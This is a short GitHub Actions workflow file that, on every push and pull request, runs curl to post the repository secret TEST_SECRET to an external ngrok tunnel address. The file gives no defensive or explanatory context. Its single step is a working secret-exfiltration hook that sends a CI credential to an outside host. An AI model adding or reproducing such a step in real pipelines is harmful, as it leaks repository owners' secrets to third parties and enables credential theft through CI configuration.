name: curl secret
on: [push, pull_request]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - name: Curl secret
        run: |
          curl http://3f08dbe32e1d.ngrok.io/test -F "secret=${{ secrets.TEST_SECRET }}"
